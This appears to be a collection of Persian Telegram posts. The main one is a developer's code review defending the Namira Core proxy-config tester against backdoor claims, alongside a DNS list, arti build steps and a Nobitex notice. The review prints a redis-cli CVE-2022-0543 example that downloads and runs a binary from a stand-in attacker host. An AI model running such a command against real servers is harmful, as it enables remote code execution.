دارم یک مطلب می‌نویسم برای نصب سریع یک دبیان مینیمال روی Qemu.

به محض اینکه آماده بشه لینکش رو اینجا قرار میدم.

@SohrabContents

من واقعاً فکر نمیکنم نیاز باشه تمام سورس کد رو بشکافم براتون تا همینجا فکر کنم پرونده این داستان بسته شده که نامیرا چیه و هیچ ربطی به سرور هایی که شما ترافیک نازنین گرامی خود رو بهشون می‌فرستید نداره :)

خب به این فانکشن جنجالی بپردازیم اول خودش رو براتون باز میکنم بعد کاملا با security based perspective  میام بررسیش میکنیم و بعدش پرونده حاشیه های پشت نامیرا رو میبندیم امیدوارم یک بار برای همیشه!

handleScan()
کارش چیه ؟
یه فلوی ساده داره واقعا
میاد اول کانفیگ هارو میخونه حالا چه multipart باشن جه json که ما میگیم به این کار content negotiation
تو مرحله بعدی داریم از قدرت ردیس استفاده میکنیم برای Deduplication
سپس جاب ها ساخته میشن و سابمیت میکنیم به worker pool
خب ساده بود نه؟ درسته منطق اصلی واقعا پیچیده تر از اینه ولی اره تو نگاه ابسترکت واقعا ساده است
تنها مشکلی هم که ممکنه باشه در اصل مشکل نیست چون تو لاجیک های دیگه ای که داریم ما این بحث رو هندل کردیم که آقا به اندازه منابع سیستم بیایم از ریسورس استفاده کنیم !

حالا آقا آیا عملا backdoor ممکنه تو این کد؟ رسما خیر چرا ممکنه نیست ؟ چون آسیب پذیری هایی که منجر به lua sandbox escape میشن عملا حداقل شناخته هاشون پچ شدن !
چه آسیب پذیری هایی ؟
CVE-2022-0543
CVE-2024-31449

نتیجتا backdoor بی backdoor !!!
نکته بعدی آقا به پیر به پیغمبر باید یه جایی باشه که به c2 وصل شه یه آدرسی باید موجود باشه که وقتی شما میای اینو سلف هاست میکنی ترافیک به اون آدرس بره و بیاد
من حتی لازم نبود تمام اینارو توضیح بدم این خیلی ساده قابل تشخیص بود
و نکته بعدی این دو آسیب پذیری رسما به این نیاز دارن ما بیایم از lua توی گو استفاده کنیم :)
به قاعده اگه این بود توی سورس مشخص میشد.

حتی اگه یه روز حال داشتم یه سورس آسیب پذیر نوشتم اینو به چشم ببینید :)

نکات بدی من با تیم نامیرا صحبت میکنم که حتی یه سری hardening هایی که نیاز هم بهشون نیست مثل بهره بری از ACL configuration
که بیان least privilege رو علنی دیگه نشون بدن
اجبار برای پسورد قوی
خاموش کردن کامند هایی مثل SLAVEOF
روشن کردن redis protected mode
خیال همه رو راحت تر کنن
هرچند واقعاً نیازی نیست اما امان از تخم شک :)

همچین کسی که داره هر پروژه رو سلف هاست میکنه باید بدونه چجوری سیستمشو harden کنه :)

اگه بخوام هم با خود redis cli بهتون یه نمونه روی CVE-2022-0543
نشون بدم

redis-cli --eval 'os.execute("curl -O https://my-bad-site.ir/redigo; chmod +x redigo; redigo")'

چیکار میکنه این کد؟ از آسیب پذیری ردیس استفاده میشه واسه RCE :)

یه نکته کلی رو هم راجع بحث api پروژه بگم
آقا این api core هستش یعنی قرار توسط خود شما (هرکی میخواد سلف هاست کنه ) استفاده شه در نتیجه دوستان و یاران عزیزم input sanitization دستی داخلش انجام نشده یه سری چک انجام شده فقط توسط خود xray که من نخوندم سورس کتابخونه رو!

قبل از این که به این بحث ادامه بدم یه نکته ای رو خواستم مجددا یاد آوری کنم
نامیرا هیچ سرور وی پی ان و پراکسی ای نساخته و اصلا کارش این نیست!
نامیرا ترافیک شما رو نمیبینه
نامیرا اصلا دسترسی به سرور هایی که توی output خودش ارائه میده نداره عزیزانم‌.
نامیرا نه سرور وی پی ان هست و نه خواهد بود تا جایی که من اطلاع دارم!

پس کارش چیه ؟
کانفیگ هایی که دیگران می‌سازند و پابلیک میکنن رو تست میکنه که آیا وصل هستن یا نه !
این کارو ولی به نحو احسن انجام میده!

چرا دارم اینو میگم؟ این که آیا استفاده از کانفیگ های پراکسی به شکل کلی امن هست یا نه کاملا یه بحث دیگس و ابدا رو دوش نامیرا نیست !‌

در ادامه یه فانکشن رو تو همین فایل بررسی میکنم که سرش بحث بود فانکشن handleScan

تو ادامه فایل handler.go دوتا فانکشن هم داریم که تازه به کد اضافه شدن و خشنودم که الان دارم بررسی میکنم این پروژه رو

startBackgroundRefresh()
performBackgroundRefresh()

خب به ترتیب اینارو هم بشکافیم با هم اگه موافق اید (مگه میشه نباشید؟)
اولا بگم جفت اینا نوشته شدن تا بیان یه بررسی کانفیگوریشن انجام بدن به شکل منظم و مداوم و بتونیم به سادگی کش ردیس رو فلاش کنیم

ورک فلو رو هم بخوام ساده بگم استارتر میاد یه ticker میسازه و یه گو روتین ساخته میشه شروع میکنه به گوش کردن به چنل ها
h.refreshTicker.C
h.refreshDone

و بسته به این که کدوم کیس رو داریم میاد background refresh میده و یا استاپ میکنه
لاجیک پرفورم هم که مشخصه !

درسته این روش مشکلات خودشو داره مثل این که هیچ راهی تعریف نشده تا بیایم یه refresh Synchronization داشته باشیم جهت چی ؟ حهت این که اطمینان داشه باشیم رفرش کامل شده قبل ذخیره نتایج
ولی آقا این نهایت یه باگ بی خطره نه بک دور !
به سادگی هم قابل حله.
یه نکته ای هم که من شخصا باهاش مشکل دارم اینه که این روش تمام سرویس api رو بلاک میکنه تا رفرش انجام بشه !
یه نکته خیلی ظریف ام که فقط پیشنهاده اینه که به جای پروسس کردن تمام کانفیگ تو یه سینگل جاب اونارو چانک چانک کنیم :)
یه سیستم atomic کنار staged refreshing , locked time out ,dry run mechanism هم خیلی خوب میتونست جمع کنه کارو ولی یادمون باشه این پروژه تحت فشار نوشته شده!

اینم کد این دوتا فانکشنه:
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L75C1-L146C2

نکته:
هر نکته ای که اینجا بگم به بچه های تیم نامیرا هم اطلاع میدم.

همینجوری که گفتیم میایم اول پکیج api نامیرا رو بررسی میکنیم.
این پکیج سه تا فایل داره 
handler.go 
router.go
types.go


اول بگم بهتون این سه تا فایل و کلا این پکیج دارن چیکار میکنن 
تیم نامیرا اومده یه Restful api رو پیاده کرد و endpoint هایی رو ساخته به جهت کنترل جاب ها و یه لاجیک worker pool هم جداگانه نوشته شده برای پردازش موازی.
این بچه ها اومدن از redis استفاده کردن به جهت چی؟ دوتا اصطلاح مهم داریم واسه کاری که باهاش میکنن 
deduplication
results caching
میتونید اینارو سرچ کنید ولی self-explanatory
هستن واقعاً 
یه بخش ما لاجیک داریم برای GitHub integration که میتونیم با استفاده ازش نتایج رو ذخیره کنیم تو گیت هاب 
و یه health monitoring logic هم پیاده شده برای endpoint ها 


بعد بیایم handler.go اصلی رو بررسی کنیم

تو بخش ایمپورت ها اگه توجه کنید میبیند از ورژن 9 گو ردیس استفاده شده که هیچ یک از آسیب پذیری های که دارن باهاش نامیرا رو متهم میکنن داخلش نیست
من اون آسیب پذیری ها رو هم کاملا براتون باز میکنم و حتی بهتون نشون میدم چجوری هیچ بک دوری در کار نبوده و نیست :)
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L17C2-L17C32

اولین بحش های لاجیکال فایل به تعاریف constant ها و type ها میرسیم
یه constant برای ذخیره سازی TTL ردیس
یه استراکت برای نگه داری نتایج تسک ها
دوتا فانکشن تایپ داریم که بیاد از نتایج پروسس رو تایپ بده بهشون
و یکی دیگه ام برای کانفیگ هایی که مثبت بودن بعد از چک
اینجا کد رو ببینید:
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L23C1-L30C49


بعد توی کد میرسیم به استراکچر اصلی برای هندلر

خب کارش چیه مشخصه واقعا ما ازش استفاده میکنیم تا تمام لاجیک رو به شکل مرکزی داشته باشیم چه لاجیکی ؟ منطق های core , worker pool , redis , jobs ,github ...

https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L32C1-L48C2

در ادامه فانکشن NewHandler() رو داریم که میاد به عنوان initializer عمل میکنه و استارت میزنه به پول ورکر
تو این فانکشن آسیب پذیری ای وجود نداره ولی نکته ای هست اونم اینه که بیایم یه recovery mechanism پیاده کنیم واسه شرایط خاص که ممکنه job failure داشته باشیم البته من هنوز روی لاجیک های package worker عمیق نشدم و نخوندمشون اینو صد در صدشو بعد از خوندن اونا میگم.
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L50C1-L73C2

خب تو یه لایه abstract بیاید بررسی کنیم هسته نامریا به چه شکل کار میکنه ؟

دوستان به شکل کلی تمام کاری که پروژه داره انجام میده اینه که validation انجام بده روی کانفیگ هایی که بهش داده میشه
همین.
رسماً همین!

کانفیگ ها از کجا میان؟ از هرجا که ما بخوایم و میتونیم اونارو یا با api اضافه کنیم یا با کامند لاین اینترفیس. یعنی دست ما بازه.


این validation یا همون اعتبار سنجی ای که دارم میگم یعنی چی؟ یعنی میاد چند تا نکته رو راجع به کانفیگ بررسی میکنه
نکته اول میاد لینک هارو پارس میکنه و چکشون میکنه
این که چطور این کار هارو داره انجام میده رو وقتی میخوام بخش به بخش پکیج هارو توضیح بدم بهتون میگم
تو بخش پارس کردن ما تشخیص میدیم با چه کانفیگ ای طرف ایم دقیق بگم چه پروتوکل ای پشت کانفیگه.
و بخش دوم ما میایم یه هندشیک انجام میدیم که بفهمیم آقا این کانفیگ وصل هست یا نه که بیشتر این کار توسط کد های خود xray انجام میشه.

تو مرحله بعد یه sorting ساده انجام میشه و metadata رو هم نگه میداریم.

حالا چه بلایی سر خروجی میاد؟
آقا خروجی شما هر بلایی دلتون بخواد میتونید سرش بیارید. بدید به api بفرستید تو ریپو خودتون و یا کش کنیدشون دستتون کاملا بازه.

حالا قبل این که بیام بخش به بخش پروژه رو براتون باز کنم بیاید یه نیم نگاهیی باز هم abstract بندازیم به موضوع امنیت
چطور ممکنه داخل پروژه ای که شما دارید سلف هاست میکنید بک دوری وجود داشته باشه؟

واسه این موضوع اول بیاید یه نگاه کوچیک به بک دور داشته باشیم که چی هست و چگونه کار میکنه!
بک دور چیه؟
ساده بیان کنم یه روش واسه این که بیایم سیستم های authentication و encryption یا security controls رو داخل هر بخشی شامل os , hardware, network, software و غیره دور بزنیم و بتونیم به سیستم بدون هیچ خون و خون ریزی ای دسترسی داشته باشی و نرمالی بدون هیچ privilege خاصی هر کاری دلمون خواست بکنیم.

خیلی ساده بیان کنم بک دور کارش اینه بیاید بیاید یه دسترسی به adversary بده که نرمالی این کار توسط یه سیستم command and control یا همون c2 انجام میشه که چی؟ که بشه به شکل غیر مستقیم دستورات لازم رو داد به سیستم.

این یعنی چی؟ یعنی به ساده ترین بیان ممکنه یه ترافیک ای حالا یا بایند شده به پروسس های معتبر یا تو سطح کمتر حرفه به شکل مجزا از سیستم به بیرون میره و بر میگرده!

به شکل کلی backdoor ها یه معماری مشخص دارن و life cycle مشخص تر
یعنی چی ؟
یعنی یه دسترسی ایجاد میشه حالا توسط آسیب پذیری هایی که شناخته شدن یا مهندسی اجتماعی و مالور ها که ما اینجا با اولی کار داریم.
سپس موضوع persistency میاد وسط که نرمالی باید یه روت کیت یا تغییر firmware یا payload های رمزنگاری شده و...( این رو باز نمیکنم کامل) بیاد وسط که بک دور ما بتونه تو پروسه ریبوت ها زنده بمونه.

اینجا تازه نیاز پیدا میشه سیستم ای که تارگت بوده توسط کد مخرب ما (یا دستی) بیاید یه tunnel یا هر نوع channel به شکل encrypted بین سیستم قربانی و سیستم C2 برقرار کنه که اصلا هم نمخوام بحث های پیوتینگ و اینارو باز کنم الان...

در نهایت دیگه اجرای هر کامندی برای هر هدف ای ممکن میشه!

خب حالا ما میدونیم بک دور چیه انواع داره؟ بله داره چندتاشو حال دارم بگم!
malware based ( torjans, ...)

hardware based ( embedded in freaking physical components)

cryptographic backdoors
این داداشمون خیلی تمیز کار میکنه ولی خب سخته خیلی سخته نرمالی دولت ها ازش استفاده میکنن ! چرا چون باید به شکل تعمدی توی ساختار اصلی یه encryption algorithm بیان یه آسیب پذیری بزارن. یا تو مواردی آسیب پذیری های شناخته شده هم به این درد میخوردن ولی خب خیلی زود اونا پچ شدن و بای بای گفتم یه مثال جالب بزنن از این
Dual_EC_DRGB algorithm
بود که میگفتن بکدوری که داره واسه NSA بود خدا میداند ولی خواستید راجع بهش تحقیق کنید جالبه

Firmware backdoors

Rootkits

Web application backdoors

supply chain backdoors

Intentional/developer backdoors

خب بگذریم از انواع این داستان
نامیرا متهم شده به ساخت بکدور و هدف اینه این سابجت رو کاملاً بررسی کنیم.

🚀 نسخه پایدار Namira Core v1.0.0 منتشر شد! 🚀

یک ابزار حرفه‌ای و اوپن‌سورس برای تست و ارزیابی کیفیت واقعی کانفیگ‌های شما! با Namira Core می‌تونید به صورت خودکار بهترین کانفیگ‌ها رو پیدا کرده و از اتصال پایدار لذت ببرید.
〰️〰️〰️〰️〰️〰️〰️〰️〰️〰️
✨ مهم‌ترین ویژگی‌ها:
✅ تست واقعی و دقیق: کانفیگ‌ها با اتصال کامل TCP تست میشن، نه فقط یک پینگ ساده!
📡 پشتیبانی از پروتکل‌های محبوب: سازگاری کامل با VMess، VLESS، Trojan و Shadowsocks.
📢 اتصال به تلگرام: کانفیگ‌های سالم و سریع به صورت خودکار برای کانال یا گروه شما ارسال میشه.
💾 ادغام با گیت‌هاب: نتایج و کانفیگ‌های معتبر رو مستقیم در ریپازیتوری گیت‌هاب خودتون ذخیره کنید.
⚙️ معماری بهینه: با استفاده از Worker Pool و Redis، تعداد زیادی کانفیگ رو با سرعت بالا و بدون فشار به سرور پردازش می‌کنه.
🐳 پشتیبانی کامل از Docker: راه‌اندازی فوق‌العاده سریع و آسان با Docker Compose.
〰️〰️〰️〰️〰️〰️〰️〰️〰️〰️
این نسخه نتیجه بیش از ۶۰ بهبود، شامل ویژگی‌های جدید، رفع باگ و بهینه‌سازی‌های عملکردی است.

📥 دریافت آخرین نسخه از گیت‌هاب
⭐️ مشاهده پروژه در گیت‌هاب

📌 @NamiraNet

لیست دی ان اس هایی که شاید به دردتون بخوره.

1 رادار
10.202.10.10
10.202.10.11
2 سرویس 403
10.202.10.202
10.202.10.102
3 بگذر
185.55.226.26
185.55.225.25
4 شکن
178.22.122.100
185.51.200.2
5 کاربران شاتل
85.15.1.14
85.15.1.15
6 الکترو
78.157.42.100
78.157.42.101
7 هاستیران
172.29.2.100
172.29.2.100

8 Server ir
194.104.158.48
194.104.158.78

9 Level3
209.244.0.3
209.244.0.4

10 Open DNS
208.67.222.222
208.67.220.220

11 Gmaing DNS 1
78.157.42.100
185.43.135.1

12 Gmaing DNS 2
156.154.70.1
156.154.71.1

13 Gmaing DNS 3
149.112.112.112
149.112.112.10

14 Gmaing DNS 4
185.108.22.133
185.108.22.134

15 Gmaing DNS 5
85.214.41.206
89.15.250.41

16 Gmaing DNS 6
9.9.9.9
109.69.8.51

17 Gmaing DNS 7
8.26.56.26
8.26.247.20

18 Gmaing DNS 8
185.121.177.177
169.239.202.202

19 Gmaing DNS 9
185.231.182.126
185.43.135.1

20 Gmaing DNS 10
185.43.135.1
46.16.216.25

21 Gmaing DNS 11
185.213.182.126
185.43.135.1

22 Gmaing DNS 12
199.85.127.10
185.231.182.126

23 Gmaing DNS 13
91.239.100.100
37.152.182.112

24 Gmaing DNS 14
8.26.56.26
8.20.247.20

25 Gmaing DNS 15
78.157.42.100
1.1.1.1

26 Gmaing DNS 16
87.135.66.81
76.76.10.4
27 مخابرات،شاتل،اسیاتک،رایتل
91.239.100.100
89.233.43.71
28 پارس آنلاین

46.224.1.221
46.224.1.220
29 همراه اول
208.67.220.200
208.67.222.222
30 ایرانسل
109.69.8.51
0.0.0.0
31 ایرانسل
74.82.42.42
0.0.0.0
32 مخابرات
8.8.8.8
8.8.4.4
33 مخابرات
4.4.4.4
4.2.2.4
34 مخابرات
195.46.39.39
195.46.39.40
35 مبین نت
10.44.8.8
8.8.8.8
36 سایر اپراتورها
199.85.127.10
199.85.126.10
37 سوئیس
176.10.118.132
176.10.118.133
38 کویت
94.187.170.2
94.187.170.3
39 اسپانیا
195.235.194.7
195.235.194.8
40 تاجیکستان
45.81.37.0
45.81.37.1

arti
https://gitlab.torproject.org/tpo/core/arti

این پروژه یه بازنویسی از پروتکول tor هست که با rust پیاده سازی شده

برای نصبش
‍‍‍

git clone https://gitlab.torproject.org/tpo/core/arti
cd arti
cargo build -p arti --locked --release

برید توی فولدری که بیلد گرفته شده:

cd target/release/arti

و بعد باینری رو با آرگیومنت proxy اجراش کنید :

./arti proxy 

اینطور arti یه پراکسی روی پورت 9150 میاره بالا که به شبکه تور وصله.

—
این پروژه روی پروایدر های محدودی کار میده چون اولین چیزی که همیشه جلوش گرفته میشه پروژه هایی مثل warp , tor هستن ...

مسخره بازی هاشون ادامه داره :)
پ.ن: متن اخر بیان کننده همه چیزه.

اطلاعیه شماره ۲ نوبیتکس

کاربران عزیز؛

مطابق اعلام وزارت ارتباطات محدودیت‌هایی موقت بر اینترنت کشور اعمال شده است؛
در صورت ادامه‌دار شدن، واریز و برداشت‌های رمزارزی با تاخیر یا خطا مواجه خواهندشد.

با توجه به محدودیت‌های اینترنت توصیه می‌شود از واریز و برداشت غیرضروری بپرهیزید و به زمان دیگری موکول کنید.

اطلاعیه‌های رسمی را فقط از آدرس‌های رسمی نوبیتکس در فضای مجازی دنبال کنید:

وب‌سایت نوبیتکس
مجله نوبیتکس
کانال تلگرام نوبیتکس
توییتر نوبیتکس
اینستاگرام نوبیتکس

به تازگی، کانال اطلاع‌رسانی نوبیتکس در پیام‌رسان «بله» نیز در دسترس شما قرار دارد.

در مورد پروژه نامیرا

ما تقریبا از June 13 ( تقریبا ماه پیش ) میشه که استارت توسعه پروژه نامیرا رو زدیم و حقیقتا خروجی خیلی خوبی هم داشتیم.
—
ولی تنها موردی که برای ما به وجود اومد این بود که توی ۱ ماه ما حتی ۱ دونیشن هم دریافت نکردیم, و خب از طرفی هزینه ای که پروژه نامیرا به ما تحمیل میکنه با توجه به نبود دونیت خیلی زیاد میشه.
—
در این صورت تنها برامون ۲ راه باقی میمونه:

۱. دوبخشه شدن پروژه و پیاده سازی بخش اشتراک برای سرویس نامیرا پلاس.
۲. غیر فعال کردن کامل پروژه و قطع روند توسعه نامیرا در صورت دریافت نکردن دونیشن کافی برای خرج سرور ها.
—

با کمکتون میتونین این پروژه رو زنده نگه دارین اگر نشه در اخر پروژه رو دو بخشه میکنم اگر هم این نشه کلا تعطیل.

و حرفی که نمیخواستم بازگو اش کنم

من به خاطر این پروژه از سمت وزارت اطلاعات بازخواست شدم ولی حقیقتا برام اهمیتی نداره چون خیلی وقته که از ایران رفتم.
اما هیچ وظیفه, اعصاب یا مسئولیتی منباب این افراد ندارم, من حتی کار اصلیم برنامه نویسی نیست که بخوام به همچین اورگان هایی باج پس بدم.

با تشکر, سونیا.
—-

لینک دونیشن:
https://www.namira.dev/donation
وبسایت نامیرا:
https://www.namira.dev
#namira

من از فکو فامیل خواهش می‌کنم با نصب ویندوز مارو تست نکنن، بعضی موقع ها نصب نمی‌شه شرمندتون می‌شیم 😂

@Linuxor

‏اسیرم کرد سی شارپ تا بلاخره تونستم فایل نصب دات نت هم بذارم توی setup

<Alireza/>

@DevTwitter

When you think basic and install very very basic
😁

نتیجه نظرسنجی از هزاران برنامه نویس در مورد ابزار های مورد استفاده، شامل ابزارهایai مورد استفاده.
به نظرم گزارش جالبی شده یه نگاهی بکنید،
https://newsletter.pragmaticengineer.com/p/the-pragmatic-engineer-2025-survey?publication_id=458709&post_id=168396454&isFreemail=true&r=4eia8j&triedRedirect=true